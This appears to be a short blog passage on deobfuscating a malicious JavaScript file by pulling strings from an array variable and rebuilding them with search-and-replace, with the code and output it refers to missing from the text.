This article wants to explain a way for malware coders to spread malicious softwares in the wild. And of course the easy way is to convince the victim to run the malicoius code himlsef. No 0day is required, no known vulnerability too.
As you know, comments are useless. Just remove it!
Now, take a look at the variable named “XyuHqSR“. It is a multidimensional array, referenced in the malicious code for six times. We can parse it to extract the strings used by the JS file. Just run this code.
To obtain the following strings, prepended by the array index.
Now, with a bit of “search & replace” and some string concatenations (follow the “+” character…), the result is a clean file you don’t need to execute in a sandbox to get the behavioural informations.
Easy to read now, ins’t it? 🙂